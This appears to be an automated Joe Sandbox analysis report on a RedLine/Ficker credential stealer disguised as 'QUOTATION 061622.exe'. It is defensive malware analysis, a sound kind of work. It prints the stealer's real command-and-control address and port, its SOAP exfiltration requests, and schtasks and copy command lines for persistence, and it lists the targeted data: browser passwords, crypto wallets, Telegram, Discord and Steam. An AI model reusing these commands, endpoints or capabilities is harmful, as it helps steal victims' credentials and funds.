Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION 061622.exe

Overview

General Information

Sample Name:QUOTATION 061622.exe
Analysis ID:647019
MD5:c2c0094c2e70379101d9704808838355
SHA1:9a492aa61c6f36f17b296c075c26ec6c82c0f72d
SHA256:3e962de98112837b963063e4db6a41ecfe2d50efc98a5cdf87bcd98fdb1af145
Tags:exeRedLineStealer
Infos:

Detection

Ficker Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Ficker Stealer
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • QUOTATION 061622.exe (PID: 5992 cmdline: "C:\Users\user\Desktop\QUOTATION 061622.exe" MD5: C2C0094C2E70379101D9704808838355)
    • vbc.exe (PID: 6472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5828 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 3444 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5952 cmdline: cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Data.exe (PID: 4224 cmdline: C:\Users\user\AppData\Roaming\Data\Data.exe MD5: C2C0094C2E70379101D9704808838355)
    • vbc.exe (PID: 5108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3856 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5212 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5140 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Data.exe (PID: 6324 cmdline: C:\Users\user\AppData\Roaming\Data\Data.exe MD5: C2C0094C2E70379101D9704808838355)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 34 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                14.2.Data.exe.36a1f70.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  14.2.Data.exe.36a1f70.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    14.2.Data.exe.36a1f70.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0xe68a:$u7: RunPE
                    • 0x11d41:$u8: DownloadAndEx
                    • 0x7330:$pat14: , CommandLine:
                    • 0x11279:$v2_1: ListOfProcesses
                    • 0xe88b:$v2_2: get_ScanVPN
                    • 0xe92e:$v2_2: get_ScanFTP
                    • 0xf61e:$v2_2: get_ScanDiscord
                    • 0x1060c:$v2_2: get_ScanSteam
                    • 0x10628:$v2_2: get_ScanTelegram
                    • 0x106ce:$v2_2: get_ScanScreen
                    • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                    • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                    • 0x11709:$v2_2: get_ScanBrowsers
                    • 0x117ca:$v2_2: get_ScannedWallets
                    • 0x117f0:$v2_2: get_ScanWallets
                    • 0x11810:$v2_3: GetArguments
                    • 0xfed9:$v2_4: VerifyUpdate
                    • 0x147e6:$v2_4: VerifyUpdate
                    • 0x11bca:$v2_5: VerifyScanRequest
                    • 0x112c6:$v2_6: GetUpdates
                    • 0x147c7:$v2_6: GetUpdates
                    21.0.vbc.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      21.0.vbc.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        Click to see the 75 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: QUOTATION 061622.exeVirustotal: Detection: 44%Perma Link
                        Source: QUOTATION 061622.exeReversingLabs: Detection: 48%
                        Antivirus detection for URL or domain
                        Source: http://185.222.58.90:17910/Avira URL Cloud: Label: malware
                        Source: http://185.222.58.90:17910Avira URL Cloud: Label: malware
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeReversingLabs: Detection: 48%
                        Machine Learning detection for sample
                        Source: QUOTATION 061622.exeJoe Sandbox ML: detected
                        Source: 5.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
                        Source: QUOTATION 061622.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: QUOTATION 061622.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49915
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49915
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49917
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49917
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49918
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49918
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49918
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPE
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1105566Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1105558Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1105829Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1105821Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficTCP traffic: 192.168.2.5:49780 -> 185.222.58.90:17910
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698007004.000000000723C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910/
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:179100
                        Source: vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910X
                        Source: vbc.exe, 00000015.00000002.695886074.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                        Source: vbc.exe, 00000015.00000003.679261338.000000000C631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/gr
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697164052.0000000006F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: vbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: vbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates0
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: vbc.exe, 00000015.00000002.698007004.000000000723C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697248055.0000000006FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentX
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme0
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: vbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: vbc.exeString found in binary or memory: https://api.ipify.orgcoo
                        Source: vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
